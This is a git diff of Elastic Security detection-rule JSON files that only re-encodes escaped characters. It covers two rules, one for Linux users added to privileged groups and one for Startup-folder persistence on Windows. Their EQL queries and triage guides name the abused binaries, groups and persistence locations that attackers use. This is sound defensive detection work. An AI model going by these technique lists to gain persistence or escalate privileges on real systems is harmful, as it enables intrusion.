If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nprocess.parent.name == \"sudo\" and\nprocess.args in (\"root\", \"admin\", \"wheel\", \"staff\", \"sudo\",\n \"disk\", \"video\", \"shadow\", \"lxc\", \"lxd\") and\n(\n process.name in (\"usermod\", \"adduser\") or\n process.name == \"gpasswd\" and \n process.args in (\"-a\", \"--add\", \"-M\", \"--members\") \n)\n", "related_integrations": [ { 
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_4.json b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_4.json
index 1b7a135d769..ca2c2833e42 100644
--- a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_4.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux User Added to Privileged Group", - "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nprocess.parent.name == \"sudo\" and\nprocess.args in (\"root\", \"admin\", \"wheel\", \"staff\", \"sudo\",\n \"disk\", \"video\", \"shadow\", \"lxc\", \"lxd\") and\n(\n process.name in (\"usermod\", \"adduser\") or\n process.name == \"gpasswd\" and \n process.args in (\"-a\", \"--add\", \"-M\", \"--members\") \n)\n", "related_integrations": [ { 
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_5.json b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_5.json
index 5c3179e4cff..f80f32e0723 100644
--- a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_5.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux User Added to Privileged Group", - "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nprocess.parent.name == \"sudo\" and\nprocess.args in (\"root\", \"admin\", \"wheel\", \"staff\", \"sudo\",\n \"disk\", \"video\", \"shadow\", \"lxc\", \"lxd\") and\n(\n process.name in (\"usermod\", \"adduser\") or\n process.name == \"gpasswd\" and \n process.args in (\"-a\", \"--add\", \"-M\", \"--members\") \n)\n", "related_integrations": [ { 
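Review bot: The new-side `note` string keeps two typos that this re-encoding pass (`\u003e` to `>`) does not touch: the heading `### Investigating Linux User User Added to Privileged Group` repeats "User", and the first investigation step reads `succesfully` where "successfully" is meant. The same text is carried unchanged in the previous version of this rule, in the hunk that ends at L1697, so correcting one file without the other would leave the two versions of the guide inconsistent. These files look like exported rule artifacts (UUID_version naming, several versions side by side); if that is the case the wording fix belongs in the rule source rather than in this package.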
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_104.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_104.json
index 07f139de324..7358af3f6e3 100644
--- a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_104.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Persistence by a Suspicious Process", - "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use 
the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. 
Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n",
 "references": [
 "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1"
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_105.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_105.json
index c435644c8fd..8379fbd9f8c 100644
--- a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_105.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Persistence by a Suspicious Process", - "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
